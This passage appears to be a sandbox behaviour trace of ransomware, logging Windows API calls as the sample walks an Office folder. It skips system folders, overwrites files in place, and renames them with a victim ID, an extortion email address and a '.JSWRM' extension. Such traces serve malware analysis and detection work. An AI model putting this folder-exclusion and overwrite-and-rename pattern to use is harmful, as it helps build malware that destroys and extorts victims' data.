RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0116.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0116.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0116.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLPERF.INI" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlperf.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.062] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2695) returned 1 [0116.062] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa80) returned 0x22fd48 [0116.062] ReadFile (in: hFile=0x238, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa80, lpOverlapped=0x0) returned 1 [0116.095] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.095] WriteFile (in: hFile=0x238, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa80, lpOverlapped=0x0) returned 1 [0116.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0116.095] CloseHandle (hObject=0x238) returned 1 [0116.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0116.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0116.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0116.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0116.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0116.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.096] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLPERF.INI" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlperf.ini"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLPERF.INI.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlperf.ini.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0116.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0116.097] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca8e89fe, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca8e89fe, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca90ec5a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1f4a8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTLWVW.DLL", cAlternateFileName="")) returned 1 [0116.097] lstrcmpiW (lpString1="OUTLWVW.DLL", lpString2=".") returned 1 [0116.097] lstrcmpiW (lpString1="OUTLWVW.DLL", lpString2="..") returned 1 [0116.097] lstrcmpiW (lpString1="OUTLWVW.DLL", lpString2="...") returned 1 [0116.097] lstrcmpiW (lpString1="OUTLWVW.DLL", lpString2="windows") returned -1 [0116.097] lstrcmpiW (lpString1="OUTLWVW.DLL", lpString2="recovery") returned -1 [0116.097] lstrcmpiW (lpString1="OUTLWVW.DLL", lpString2="perflogs") returned -1 [0116.097] lstrcmpiW (lpString1="OUTLWVW.DLL", lpString2="documents and settings") returned 1 [0116.097] lstrcmpiW (lpString1="OUTLWVW.DLL", lpString2="$RECYCLE.BIN") returned 1 [0116.097] lstrcmpiW (lpString1="OUTLWVW.DLL", lpString2="system volume information") returned -1 [0116.097] lstrcmpiW (lpString1="OUTLWVW.DLL", lpString2="msocache") returned 1 [0116.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0116.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0116.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLWVW.DLL", lpUsedDefaultChar=0x0) returned 11 [0116.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0116.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0116.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0116.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLWVW.DLL", lpUsedDefaultChar=0x0) returned 11 [0116.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0116.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0116.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0116.098] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x46fe4fe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x46fe4fe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46fe4fe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PASSPORT.CSS", cAlternateFileName="")) returned 1 [0116.098] lstrcmpiW (lpString1="PASSPORT.CSS", lpString2=".") returned 1 [0116.098] lstrcmpiW (lpString1="PASSPORT.CSS", lpString2="..") returned 1 [0116.098] lstrcmpiW (lpString1="PASSPORT.CSS", lpString2="...") returned 1 [0116.098] lstrcmpiW (lpString1="PASSPORT.CSS", lpString2="windows") returned -1 [0116.098] lstrcmpiW (lpString1="PASSPORT.CSS", lpString2="recovery") returned -1 [0116.098] lstrcmpiW (lpString1="PASSPORT.CSS", lpString2="perflogs") returned -1 [0116.098] lstrcmpiW (lpString1="PASSPORT.CSS", lpString2="documents and settings") returned 1 [0116.098] lstrcmpiW (lpString1="PASSPORT.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.098] lstrcmpiW (lpString1="PASSPORT.CSS", lpString2="system volume information") returned -1 [0116.098] lstrcmpiW (lpString1="PASSPORT.CSS", lpString2="msocache") returned 1 [0116.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0116.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PASSPORT.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PASSPORT.CSS", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PASSPORT.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0116.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0116.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PASSPORT.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PASSPORT.CSS", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PASSPORT.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0116.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0116.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0116.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0116.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PASSPORT.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\passport.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.102] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0116.103] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0116.104] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0116.105] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.105] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0116.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0116.106] CloseHandle (hObject=0x238) returned 1 [0116.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0116.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0116.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0116.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0116.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0116.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.106] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PASSPORT.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\passport.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PASSPORT.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\passport.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0116.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0116.107] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x46fe4fe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x46fe4fe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46fe4fe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PASTEL.CSS", cAlternateFileName="")) returned 1 [0116.107] lstrcmpiW (lpString1="PASTEL.CSS", lpString2=".") returned 1 [0116.107] lstrcmpiW (lpString1="PASTEL.CSS", lpString2="..") returned 1 [0116.107] lstrcmpiW (lpString1="PASTEL.CSS", lpString2="...") returned 1 [0116.107] lstrcmpiW (lpString1="PASTEL.CSS", lpString2="windows") returned -1 [0116.107] lstrcmpiW (lpString1="PASTEL.CSS", lpString2="recovery") returned -1 [0116.107] lstrcmpiW (lpString1="PASTEL.CSS", lpString2="perflogs") returned -1 [0116.107] lstrcmpiW (lpString1="PASTEL.CSS", lpString2="documents and settings") returned 1 [0116.107] lstrcmpiW (lpString1="PASTEL.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.107] lstrcmpiW (lpString1="PASTEL.CSS", lpString2="system volume information") returned -1 [0116.108] lstrcmpiW (lpString1="PASTEL.CSS", lpString2="msocache") returned 1 [0116.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0116.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PASTEL.CSS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PASTEL.CSS", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PASTEL.CSS", lpUsedDefaultChar=0x0) returned 10 [0116.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0116.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0116.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PASTEL.CSS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PASTEL.CSS", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PASTEL.CSS", lpUsedDefaultChar=0x0) returned 10 [0116.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0116.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0116.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0116.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0116.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PASTEL.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pastel.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.109] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0116.109] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0116.109] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0116.110] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.111] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0116.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0116.111] CloseHandle (hObject=0x238) returned 1 [0116.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0116.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0116.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0116.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0116.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0116.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.111] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PASTEL.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pastel.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PASTEL.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pastel.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0116.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0116.112] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1e03f98, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1e03f98, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1e03f98, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x39e60, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PE.VSL", cAlternateFileName="")) returned 1 [0116.112] lstrcmpiW (lpString1="PE.VSL", lpString2=".") returned 1 [0116.112] lstrcmpiW (lpString1="PE.VSL", lpString2="..") returned 1 [0116.112] lstrcmpiW (lpString1="PE.VSL", lpString2="...") returned 1 [0116.112] lstrcmpiW (lpString1="PE.VSL", lpString2="windows") returned -1 [0116.112] lstrcmpiW (lpString1="PE.VSL", lpString2="recovery") returned -1 [0116.112] lstrcmpiW (lpString1="PE.VSL", lpString2="perflogs") returned -1 [0116.112] lstrcmpiW (lpString1="PE.VSL", lpString2="documents and settings") returned 1 [0116.112] lstrcmpiW (lpString1="PE.VSL", lpString2="$RECYCLE.BIN") returned 1 [0116.112] lstrcmpiW (lpString1="PE.VSL", lpString2="system volume information") returned -1 [0116.112] lstrcmpiW (lpString1="PE.VSL", lpString2="msocache") returned 1 [0116.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE.VSL", cchWideChar=6, lpMultiByteStr=0x0, 